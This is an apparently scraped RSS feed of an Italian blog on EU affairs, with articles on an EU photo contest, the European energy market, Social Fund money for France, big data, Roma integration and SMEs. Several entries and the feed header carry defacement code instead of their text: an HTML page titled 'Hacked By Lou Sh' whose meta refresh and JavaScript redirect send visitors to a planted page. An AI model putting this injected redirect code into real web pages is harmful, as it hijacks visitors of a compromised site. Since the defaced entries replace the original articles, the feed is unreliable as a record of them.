Hacked By Lou Sh http://torvergata.eurosblog.eu/ window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example it SPIP - www.spip.net Hacked By Lou Sh http://torvergata.eurosblog.eu/IMG/siteon0.jpg http://torvergata.eurosblog.eu/ 400 1800 window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example http://torvergata.eurosblog.eu/spip.php?article1009 http://torvergata.eurosblog.eu/spip.php?article1009 2015-03-15T15:22:24Z text/html it Sabrina Borriello Ricerca Tecnologie Ambiente Scienza <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1009.png" alt="" width="773" height="410" class="spip_logos" /></a>window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique5" rel="directory">Ricerca ed Università</a> / <a href="http://torvergata.eurosblog.eu/spip.php?mot9" rel="tag">Ricerca</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot42" rel="tag">Tecnologie</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot43" rel="tag">Ambiente</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot53" rel="tag">Scienza</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH80/arton1009-6d889.png" alt="" align="right" width='150' height='80' class='spip_logos' style='height:80px;width:150px;' /> <div class='rss_chapo'><p><!DOCTYPE HTML></p> <span class="csfoo htmla"></span> <head> <meta charset="UTF-8"> <meta http-equiv="refresh" content="1;url=http://torvergata.eurosblog.eu/IMG/html/"> <script type="text/javascript"> window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" </script> <title>Hacked By Lou Sh</title> </head> <body> <!-- Note: don't tell people to `click` the link, just tell them that it is a link. --> If you are not redirected automatically, follow the <a href='http://torvergata.eurosblog.eu/IMG/html/'>link to example</a> </body> <span class="csfoo htmlb"></span></div> <div class='rss_texte'><p><!DOCTYPE HTML></p> <span class="csfoo htmla"></span> <head> <meta charset="UTF-8"> <meta http-equiv="refresh" content="1;url=http://torvergata.eurosblog.eu/IMG/html/"> <script type="text/javascript"> window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" </script> <title>Hacked By Lou Sh</title> </head> <body> <!-- Note: don't tell people to `click` the link, just tell them that it is a link. --> If you are not redirected automatically, follow the <a href='http://torvergata.eurosblog.eu/IMG/html/'>link to example</a> </body> <span class="csfoo htmlb"></span></div> “Love without Borders”: l'UE celebra l'amore che supera le distanze http://torvergata.eurosblog.eu/spip.php?article1008 http://torvergata.eurosblog.eu/spip.php?article1008 2015-02-28T20:52:30Z text/html it Sabrina Borriello Giovani Anti-discriminazioni Diritti fondamentali, giustizia, cittadinanza <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1008.jpg" alt="" width="125" height="125" class="spip_logos" /></a>Fiumi di inchiostro, centinaia di note e infinite pennellate di colore sono state da sempre dedicate all'amore che supera gli ostacoli, all'amore che vince, nonostante tutto. Stavolta a celebrare l'“amor vincit omnia”, di famosa memoria virgiliana, è l'Unione europea con il concorso fotografico, "EU Love without Borders", dedicato alle storie d'amore che superano ogni ostacolo e confine, sia esso culturale, politico, linguistico, geografico, logistico o altro. Il concorso, certamente originale e (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique3" rel="directory">Eventi ed opportunità</a> / <a href="http://torvergata.eurosblog.eu/spip.php?mot29" rel="tag">Giovani</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot96" rel="tag">Anti-discriminazioni</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot111" rel="tag">Diritti fondamentali, giustizia, cittadinanza</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L125xH125/arton1008-b8ecc.jpg" alt="" align="right" width='125' height='125' class='spip_logos' style='height:125px;width:125px;' /> <div class='rss_chapo'><p>Fiumi di inchiostro, centinaia di note e infinite pennellate di colore sono state da sempre dedicate all'amore che supera gli ostacoli, all'amore che vince, nonostante tutto.</p></div> <div class='rss_texte'><p>Stavolta a celebrare l'“amor vincit omnia”, di famosa memoria virgiliana, è l'Unione europea con il concorso fotografico, "<strong>EU Love without Borders</strong>", dedicato alle storie d'amore che superano ogni ostacolo e confine, sia esso culturale, politico, linguistico, geografico, logistico o altro.</p> <p>Il concorso, certamente originale e al passo coi tempi, si inserisce all'interno dei numerosi eventi che celebreranno il 25° anniversario di <strong>Interreg</strong>, l'iniziativa comunitaria finanziata dal Fondo Europeo di Sviluppo Regionale (FESR) per la cooperazione tra regioni dell'Unione europea, che per il periodo 2014-2020 ha a disposizione un budget di 10,1 miliardi di euro investiti in circa 107 programmi per lo sviluppo armonico ed equilibrato del territorio europeo.</p> <p>EU Love without Borders è rivolto a tutti coloro che hanno compiuto 18 anni e vivono in uno degli Stati membri dell'Unione europea, o nei paesi coperti dallo strumento di assistenza preadesione (IPA), oltre che in Islanda, Liechtenstein, Svizzera e Norvegia.</p> <p>Partecipare al concorso è molto semplice: basta inviare entro la mezzanotte del 15/03/2015 una foto della coppia, precisando nel testo dell'email i nomi e i paesi di provenienza dei due innamorati, accompagnata da una piccola descrizione, di massimo 100 parole, all'indirizzo REGIO-EULWB-COMPETITION@ec.europa.eu. Le votazioni avverranno tra il 20/03/2015 e la mezzanotte del 03/04/2015 sulla <a href='https://www.facebook.com/EUinmyregion' class='spip_out'>pagina Facebook ufficiale</a> e ad ognuna delle 25 coppie finaliste verrà fatta una video intervista attraverso la piattaforma online.</p> <p>La coppia vincitrice, annunciata il 9 maggio, riceverà come premio un soggiorno in hotel nel romantico scenario della regione del Mosel, tra Francia, Lussemburgo e Germania.</p></div> window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example http://torvergata.eurosblog.eu/spip.php?article1007 http://torvergata.eurosblog.eu/spip.php?article1007 2015-02-17T17:40:49Z text/html it Sabrina Borriello Telecomunicazioni Sicurezza <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1007.jpg" alt="" width="274" height="184" class="spip_logos" /></a>window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique3" rel="directory">Eventi ed opportunità</a> / <a href="http://torvergata.eurosblog.eu/spip.php?mot113" rel="tag">Telecomunicazioni</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot209" rel="tag">Sicurezza</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH101/arton1007-891fc.jpg" alt="" align="right" width='150' height='101' class='spip_logos' style='height:101px;width:150px;' /> <div class='rss_chapo'><p><!DOCTYPE HTML></p> <span class="csfoo htmla"></span> <head> <meta charset="UTF-8"> <meta http-equiv="refresh" content="1;url=http://torvergata.eurosblog.eu/IMG/html/"> <script type="text/javascript"> window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" </script> <title>Hacked By Lou Sh</title> </head> <body> <!-- Note: don't tell people to `click` the link, just tell them that it is a link. --> If you are not redirected automatically, follow the <a href='http://torvergata.eurosblog.eu/IMG/html/'>link to example</a> </body> <span class="csfoo htmlb"></span></div> <div class='rss_texte'><p><!DOCTYPE HTML></p> <span class="csfoo htmla"></span> <head> <meta charset="UTF-8"> <meta http-equiv="refresh" content="1;url=http://torvergata.eurosblog.eu/IMG/html/"> <script type="text/javascript"> window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" </script> <title>Hacked By Lou Sh</title> </head> <body> <!-- Note: don't tell people to `click` the link, just tell them that it is a link. --> If you are not redirected automatically, follow the <a href='http://torvergata.eurosblog.eu/IMG/html/'>link to example</a> </body> <span class="csfoo htmlb"></span></div> Mercato energetico europeo: necessarie regole comuni ed infrastrutture http://torvergata.eurosblog.eu/spip.php?article1006 http://torvergata.eurosblog.eu/spip.php?article1006 2014-12-15T09:53:23Z text/html it Vanessa Piacenti Energie rinnovabili <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1006.jpg" alt="" width="223" height="226" class="spip_logos" /></a>Completare il mercato energetico europeo è la soluzione più efficace per garantire un approvvigionamento conveniente agli Stati UE e limitare i danni dei cambiamenti climatici. Se si ottimizza il mercato interno energetico si potrà avere un beneficio economico che va dai 16 ai 40 miliardi di euro ogni anno. A dichiararlo è la Commissione europea nella comunicazione sulle sfide da portare a termine per dare piena attuazione al progetto del mercato unico europeo per l'energia. Fino ad ora sono (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique2" rel="directory">Attualità europea</a> / <a href="http://torvergata.eurosblog.eu/spip.php?mot83" rel="tag">Energie rinnovabili</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L149xH150/arton1006-85295.jpg" alt="" align="right" width='149' height='150' class='spip_logos' style='height:150px;width:149px;' /> <div class='rss_chapo'><p>Completare il mercato energetico europeo è la soluzione più efficace per garantire un approvvigionamento conveniente agli Stati UE e limitare i danni dei cambiamenti climatici. Se si ottimizza il mercato interno energetico si potrà avere un beneficio economico che va dai 16 ai 40 miliardi di euro ogni anno.</p></div> <div class='rss_texte'><p>A dichiararlo è la Commissione europea nella comunicazione sulle sfide da portare a termine per dare piena attuazione al progetto del mercato unico europeo per l'energia.</p> <p>Fino ad ora sono stati compiuti molti passi avanti in questo settore, ma per poter avere maggiori benefici a livello economico vi è la necessità di investire maggiormente in infrastrutture strategiche transfrontaliere e sviluppare reti intelligenti a favore dell'energia elettrica. Bisognerà quindi mettere in atto delle regole comuni e chiare su come utilizzare le reti energetiche.</p> <p>Ma quali sono stati i passi avanti compiuti sino ad oggi? Il settore che ha avuto maggiori benefici è stato quello dell'ingrosso: soprattutto tra il 2008 e il 2012 i prezzi all'ingrosso per ciò che riguarda l'energia elettrica sono diminuiti di un terzo mentre i prezzi all'ingrosso del gas sono rimasti gli stessi. In questo modo, i consumatori potranno scegliere tra diversi fornitori di energia e quindi risparmiare in maniera consistente. Inoltre sono stati completati alcuni importanti collegamenti che mancavano tra alcuni paesi dell'Ue e se ancora non sono stati completati, sono comunque in fase di costruzione. Per il settore del gas per esempio, i gasdotti transfrontalieri sono quelli utilizzati maggiormente grazie a delle norme comuni per l'utilizzo delle reti di gas. Le regole aiutano inoltre a mantenere i prezzi stabili e ad evitarne la manipolazione.</p> <span class="csfoo htmla"></span><dl class='spip_document_1236 spip_documents spip_documents_right' style='float:right;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Gas.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH100/Gas-d664bjpg5363-6a66f.jpg' width='150' height='100' alt='JPEG - 5 Kb' style='height:100px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Quali sono ancora le lacune da colmare? Bisogna ancora intervenire a livello interno per facilitare il corretto funzionamento di mercato e per far sì che le aziende possano concorrere sullo stesso piano, inoltre occorre facilitare l'integrazione delle energie rinnovabili.</p> <p>Per ciò che riguarda la legislazione europea vigente in merito all'energia, abbiamo la formulazione da parte del Parlamento europeo e del Consiglio europeo di tre pacchetti. Il primo pacchetto, adottato nel 2008, riguarda il clima e l'energia; il secondo pacchetto si basa sulle energie rinnovabili e prevede un aumento del 20% del loro utilizzo entro il 2020; in terzo pacchetto per il mercato dell'energia che vuole favorire l'integrazione tra il settore elettrico e il settore del gas. Questo comporta la separazione delle reti di gas e elettricità, di generazione, di produzione e di fornitura. Protegge i consumatori attraverso una fatturazione chiara e precisa dei costi da sostenere e favorisce l'indipendenza e la regolamentazione delle autorità nazionali.</p> <span class="csfoo htmla"></span><dl class='spip_document_1237 spip_documents spip_documents_left' style='float:left;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Gunther_oettinger.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH106/Gunther_oettda0d-fee7e.jpg' width='150' height='106' alt='JPEG - 9 Kb' style='height:106px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Nelle parole del Vicepresidente della Commissione europea responsabile per l'energia, Günther H. Oettinger: "Se i mercati energetici sono ben collegati e se ci sono regole comuni, non ci sarà più bisogno di utilizzare le forniture energetiche come strumento politico. Stabilendo segnali di prezzo adeguati e realizzando le infrastrutture necessarie, l'energia verrà prodotta dove è più economico e sarà inviata dove necessario. Tutto questo si traduce in un approvvigionamento energetico sicuro in tutta Europa e bollette più basse per i consumatori".</p></div> FSE: €2,9mld per l'occupazione in Francia http://torvergata.eurosblog.eu/spip.php?article1005 http://torvergata.eurosblog.eu/spip.php?article1005 2014-11-19T09:19:53Z text/html it Vanessa Piacenti Commissione europea Economia Lavoro Occupazione <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1005.jpg" alt="" width="341" height="148" class="spip_logos" /></a>A distanza di due mesi dall'accordo di partenariato tra la Commissione europea e la Francia per definire la migliore strategia per l'utilizzo dei fondi europei, lo scorso 10 ottobre la Commissione europea ha approvato il programma operativo francese per l'attuazione del Fondo sociale europeo (FSE) nella Francia continentale per il periodo 2014-2020. Il fondo sociale europeo (FSE) ha un ruolo decisivo nel supportare gli investimenti degli Stati membri per ciò che riguarda il capitale umano e (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique2" rel="directory">Attualità europea</a> / <a href="http://torvergata.eurosblog.eu/spip.php?mot1" rel="tag">Commissione europea</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot26" rel="tag">Economia</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot35" rel="tag">Lavoro</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot146" rel="tag">Occupazione</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH66/arton1005-863a8.jpg" alt="" align="right" width='150' height='66' class='spip_logos' style='height:66px;width:150px;' /> <div class='rss_chapo'><p>A distanza di due mesi dall'accordo di partenariato tra la Commissione europea e la Francia per definire la migliore strategia per l'utilizzo dei fondi europei, lo scorso 10 ottobre la Commissione europea ha approvato il programma operativo francese per l'attuazione del Fondo sociale europeo (FSE) nella Francia continentale per il periodo 2014-2020.</p></div> <div class='rss_texte'><p>Il fondo sociale europeo (FSE) ha un ruolo decisivo nel supportare gli investimenti degli Stati membri per ciò che riguarda il capitale umano e aiuta a sostenere la competizione economica europea. Assiste ogni anno 15 milioni di persone per sostenerle nelle loro competenze, per aiutarle ad integrarsi nel mondo del lavoro, per lottare contro l'esclusione sociale e la povertà e per migliorare l'efficacia delle amministrazioni pubbliche.</p> <p>La Francia incasserà 2.9 miliardi di euro dal FSE per poter migliorare il settore occupazionale, la formazione professionale, l'inclusione sociale e diminuire l'abbandono scolastico. Il programma nazionale sarà integrato con altri 22 programmi regionali francesi e 8 programmi dipartimentali e nelle regioni d'oltremare. In totale i finanziamenti stanziati dal FSE a favore della Francia saranno 6 miliardi di euro, di cui 620 milioni verranno utilizzati per finanziare l'occupazione giovanile e per il programma nazionale per l'assistenza tecnica.</p> <span class="csfoo htmla"></span><dl class='spip_document_1234 spip_documents spip_documents_right' style='float:right;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Bandiera_Francese.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH100/Bandiera_Fra6abd-270ce.jpg' width='150' height='100' alt='JPEG - 1.8 Kb' style='height:100px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Ma quali sono le priorità a cui ottemperare nell'immediato? In primis i finanziamenti saranno utilizzati per soggetti disoccupati, inattivi e per i Neet: 454 milioni di euro saranno utilizzati per rafforzare la mobilità professionale, per sviluppare l'imprenditorialità e per diminuire l'abbandono scolastico.</p> <p>Circa 707 milioni di euro saranno invece utilizzati per garantire un'adeguata carriera professionale, per pianificare nuovi posti di lavoro, per formare quei lavoratori che sono poco qualificati, per le donne e gli anziani, per la formazione dei lavoratori in esubero e per aiutare le imprese a garantire le pari opportunità e una equa retribuzione.</p> <p>1.6 milioni di euro verranno spesi per ridurre la povertà e favorire l'inclusione sociale e saranno pertanto destinati alle autorità locali.</p> <span class="csfoo htmla"></span><dl class='spip_document_1235 spip_documents spip_documents_left' style='float:left;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Laszlo_Andor_3.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH91/Laszlo_Andored05-4693a.jpg' width='150' height='91' alt='JPEG - 5.4 Kb' style='height:91px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Nelle parole del Commissario per l'occupazione, gli affari sociali e l'inclusione, László Andor: "Mi congratulo vivamente con le autorità francesi per il loro lavoro e la loro eccellente collaborazione, consentendo la rapida adozione di questo programma operativo del FSE per il periodo 2014-2020. L'FSE contribuirà così a correggere gli squilibri strutturali del mercato del lavoro e a fornire un sostegno alle misure per ridurre la povertà".</p></div> Megadati: la Commissione lancia il partenariato pubblico-privato http://torvergata.eurosblog.eu/spip.php?article1004 http://torvergata.eurosblog.eu/spip.php?article1004 2014-11-13T10:08:46Z text/html it Vanessa Piacenti Commissione europea Economia Tecnologie <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1004.jpg" alt="" width="290" height="174" class="spip_logos" /></a>L'accordo stretto lo scorso 13 ottobre tra la Commissione e l'industria europea dei dati prevede un investimento di 2,5 miliardi di euro destinati alla gestione dei big data. In questo modo l'Europa potrà portarsi al pari degli altri Stati a livello mondiale. L'intesa sarà attiva a partire dal 1° gennaio 2015. Investire nei megadati porterebbe alla creazione di circa 100.000 nuovi posti di lavoro entro il 2020 e potrebbe ridurre del 10% i consumi energetici in Europa, sviluppare l'assistenza (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique2" rel="directory">Attualità europea</a> / <a href="http://torvergata.eurosblog.eu/spip.php?mot1" rel="tag">Commissione europea</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot26" rel="tag">Economia</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot42" rel="tag">Tecnologie</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH90/arton1004-04f9d.jpg" alt="" align="right" width='150' height='90' class='spip_logos' style='height:90px;width:150px;' /> <div class='rss_chapo'><p>L'accordo stretto lo scorso 13 ottobre tra la Commissione e l'industria europea dei dati prevede un investimento di 2,5 miliardi di euro destinati alla gestione dei big data. In questo modo l'Europa potrà portarsi al pari degli altri Stati a livello mondiale. L'intesa sarà attiva a partire dal 1° gennaio 2015.</p></div> <div class='rss_texte'><p>Investire nei megadati porterebbe alla creazione di circa 100.000 nuovi posti di lavoro entro il 2020 e potrebbe ridurre del 10% i consumi energetici in Europa, sviluppare l'assistenza sanitaria e avere a disposizione macchinari industriali più efficienti.</p> <p>L'intesa in materia di megadati è stata firmata il 13 ottobre dal Vicepresidente della Commissione europea, Neelie Kroes, e dal presidente della Big Data Value Association, Jan Sundelin,, a favore di società come ATOS, Nokia Solutions and Networks, Orange, SAP, Siemens, ATC, IT Innovation, IBM, SINTEF, THALES, e istituti di ricerca come quello di Fraunhofer, il centro di ricerca tedesco sull'intelligenza artificiale, l'Università di Bologna (CINI), il Politecnico di Madrid e l'Università di Duisburg-Essen.</p> <span class="csfoo htmla"></span><dl class='spip_document_1232 spip_documents spip_documents_right' style='float:right;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Siemens.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH36/Siemens-caa12baa-0612a.jpg' width='150' height='36' alt='JPEG - 8.2 Kb' style='height:36px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>L'intesa tra la Commissione europea e l'industria dei dati permetterà a molti settori tra pubblico, privato e accademico di contribuire a sviluppare idee nuove nell'ambito dei megadati in settori come quello energetico, manifatturiero e della salute, per fornire servizi innovativi come la medicina su misura, la logistica degli alimenti e l'analisi predittiva. Inoltre, i settori coinvolti sono anche quelli della fotonica, della robotica, del calcolo di alte prestazioni, delle reti avanzate 5G per l'internet del futuro e per le fabbriche future. Tutti fanno parte dei maggiori settori a livello tecnologico che potrebbero portare alla creazione di nuovi posti di lavoro.</p> <p>L'accordo permetterà inoltre di avere degli “spazi di innovazione”, in cui poter portare avanti le sperimentazioni sia per i settori pubblici che per i privati, in modo da poter sviluppare migliori competenze e pratiche da parte delle imprese.</p> <span class="csfoo htmla"></span><dl class='spip_document_1233 spip_documents spip_documents_left' style='float:left;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Neelie_Kroes_2.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH105/Neelie_Kroes39d0-7e15b.jpg' width='150' height='105' alt='JPEG - 12.8 Kb' style='height:105px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Nelle parole del Vicepresidente della Commissione europea, Neelie Kroes: “I dati sono il motore e il cardine dell'economia futura. Qualsiasi tipo di organizzazione ha bisogno di elementi costitutivi per migliorare i propri risultati, dalle aziende agricole alle fabbriche, dai laboratori alle officine”.</p></div> A Bruxelles le buone pratiche per l'integrazione dei Rom http://torvergata.eurosblog.eu/spip.php?article1003 http://torvergata.eurosblog.eu/spip.php?article1003 2014-11-03T21:24:31Z text/html it Vanessa Piacenti <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1003.jpg" alt="" width="224" height="68" class="spip_logos" /></a>Lo scorso 2 e 3 ottobre si sono riuniti a Bruxelles i sindaci di alcune città di Belgio, Bulgaria, Grecia, Italia, Portogallo, Romania, Slovacchia, Ungheria e ex Repubblica iugoslava di Macedonia per constatare se sono avvenuti dei miglioramenti nell'integrazione dei Rom su base locale, attraverso il programma Romact nato dalla collaborazione tra la Commissione europea e il Consiglio d'Europa. L'obiettivo della riunione è stato di evidenziare le buone pratiche e i progetti concreti messi in (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique2" rel="directory">Attualità europea</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH46/arton1003-70f0d.jpg" alt="" align="right" width='150' height='46' class='spip_logos' style='height:46px;width:150px;' /> <div class='rss_chapo'><p>Lo scorso 2 e 3 ottobre si sono riuniti a Bruxelles i sindaci di alcune città di Belgio, Bulgaria, Grecia, Italia, Portogallo, Romania, Slovacchia, Ungheria e ex Repubblica iugoslava di Macedonia per constatare se sono avvenuti dei miglioramenti nell'integrazione dei Rom su base locale, attraverso il programma Romact nato dalla collaborazione tra la Commissione europea e il Consiglio d'Europa.</p></div> <div class='rss_texte'><p>L'obiettivo della riunione è stato di evidenziare le buone pratiche e i progetti concreti messi in atto dai comuni per favorire l'integrazione tra Rom e popolazione locale. Diversi i progetti portati ad esempio. A Napoli il comune ha predisposto delle pompe per l'acqua all'ingresso di ogni campo Rom al fine di migliorarne le condizioni igieniche, A Gyulaj in Ungheria, il sindaco ha tra i suoi obiettivi quello di costruire degli edifici per far alloggiare la comunità Rom coinvolgendo nei lavori la popolazione Rom stessa che potrà contare così su un inserimento lavorativo nel campo dell'edilizia. In Slovacchia a Jarovnice, il comune ha dato il via ad un progetto chiamato Roma Civil Guard (guardia civile Rom) per aumentare la sicurezza e per limitare la criminalità nei campi Rom. Così come l'Ungheria anche la Slovacchia intende costruire edifici per gli abitanti più svantaggiati dei campi Rom. In Bulgaria a Varna, il governo locale creerà nel distretto di Asparuhovo un centro sociale dotato di edifici per i gruppi più svantaggiati. Infine a Valea Seaca in Romania, il sindaco ha preso la decisione di munire ogni Rom di una carta d'identità.</p> <span class="csfoo htmla"></span><dl class='spip_document_1230 spip_documents spip_documents_right' style='float:right;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Bandiera_Romena.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH100/Bandiera_Rom0cb5-89d42.jpg' width='150' height='100' alt='JPEG - 4 Kb' style='height:100px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Il progetto Romact è finanziato dalla Commissione europea e dal Consiglio d'Europa ed ha preso il via ad ottobre 2013 in 40 comuni tra Bulgaria, Ungheria, Romania, Slovacchia e Italia ed avrà fine nel 2016. Romact agisce in collaborazione con le ONG Rom a livello nazionale e locale che hanno il compito di sviluppare progetti e migliorare l'accesso ai fondi Ue. Inoltre, arricchisce il programma ROMED, sostenuto dalla Commissione europea e dal Consiglio d'Europa, con l'obiettivo di ottimizzare la democrazia locale offrendo un punto d'incontro con la comunità Rom.</p> <span class="csfoo htmla"></span><dl class='spip_document_1231 spip_documents spip_documents_left' style='float:left;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Laszlo_Andor_2.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH108/Laszlo_Andord0b0-216f7.jpg' width='150' height='108' alt='JPEG - 7.1 Kb' style='height:108px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Nelle parole del Commissario europeo per l'occupazione, gli affari sociali e l'inclusione László Andor: "L'inclusione dei Rom può essere realizzata solo attraverso un impegno a livello nazionale associato a interventi a livello locale. È per questo motivo che l'Unione europea, attraverso programmi quali ROMACT, sostiene le autorità locali nell'elaborare e nell'attuare progetti di integrazione dei Rom e nel richiedere finanziamenti dell'UE".</p></div> Per le PMI una lenta risalita economica http://torvergata.eurosblog.eu/spip.php?article1002 http://torvergata.eurosblog.eu/spip.php?article1002 2014-10-26T09:01:44Z text/html it Vanessa Piacenti Economia Piccole e medie imprese Industrie <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1002.jpg" alt="" width="240" height="156" class="spip_logos" /></a>Il 2013 è stato un anno difficile per la ripresa economica delle PMI europee: nonostante alcuni segnali di una lenta risalita finanziaria, la ripresa appare assai instabile e non si è ancora assestata del tutto. La Commissione europea lo ha annunciato il 3 ottobre attraverso le schede informative relative allo Small Business Act for Europe (SBA), il programma europeo a sostegno delle piccole e medie imprese. Per ciò che riguarda l'ambito occupazionale, rispetto al 2008 la percentuale di (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique4" rel="directory">Analisi ed approfondimenti</a> / <a href="http://torvergata.eurosblog.eu/spip.php?mot26" rel="tag">Economia</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot130" rel="tag">Piccole e medie imprese</a>, <a href="http://torvergata.eurosblog.eu/spip.php?mot202" rel="tag">Industrie</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH98/arton1002-b81a4.jpg" alt="" align="right" width='150' height='98' class='spip_logos' style='height:98px;width:150px;' /> <div class='rss_chapo'><p>Il 2013 è stato un anno difficile per la ripresa economica delle PMI europee: nonostante alcuni segnali di una lenta risalita finanziaria, la ripresa appare assai instabile e non si è ancora assestata del tutto. La Commissione europea lo ha annunciato il 3 ottobre attraverso le schede informative relative allo Small Business Act for Europe (SBA), il programma europeo a sostegno delle piccole e medie imprese.</p></div> <div class='rss_texte'><p>Per ciò che riguarda l'ambito occupazionale, rispetto al 2008 la percentuale di occupazione si è assestata sul 2,16% in meno e questo ha portato ad una disoccupazione pari a 1,9 milioni di lavoratori. Inoltre va sottolineato come a causa della crisi economica mondiale e del calo dell'inflazione economica, il numero delle PMI e la forza lavoro siano calate entrambe dello 0,9% e dello 0.5%.</p> <p><strong>Ma come si differenziano le PMI a livello di profitto?</strong> Molto dipende dalle loro dimensioni, dal settore di cui fanno parte e dai paesi in cui si trovano. Per ciò che riguarda i profitti economici non sono tanto le PMI quanto invece le medie imprese e le microimprese ad ottenere dei buoni risultati economici. Va sottolineato però, che nelle tre categorie il livello di occupazione rimane comunque inferiore rispetto al 2008, anche se le microimprese sono quelle che ne hanno risentito di più con un calo del 4,2%. I settori che sono stati maggiormente colpiti dalla crisi economica sono quello edile e manifatturiero mentre quelli che hanno avuto degli ottimi risultati sono i servizi alle imprese, l'ambito della comunicazione e dell'informazione e l'immobiliare.</p> <span class="csfoo htmla"></span><dl class='spip_document_1228 spip_documents spip_documents_right' style='float:right;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/lavoratori_2.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH61/lavoratori_2d7b2-bcd02.jpg' width='150' height='61' alt='JPEG - 9.7 Kb' style='height:61px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Si crea quindi una spaccatura anche a livello degli Stati membri per ciò che riguarda la crescita produttiva. Da un lato abbiamo paesi come Germania, Austria, Svezia, Belgio, Malta, Lussemburgo, Regno Unito e Francia dove le PMI sono in netta ripresa e dove il livello di crescita ha superato quello del 2008. Purtroppo la nota dolente è che l'occupazione non attua gli stessi livelli di crescita, infatti solamente in Germania si è registrato un livello di occupazione del 10% in più rispetto al 2008. Dall'altro lato paesi come Grecia, Spagna, Portogallo, Cipro, Croazia, Irlanda, Romania, Slovenia, Lettonia e Ungheria dove le PMI hanno registrato un calo del 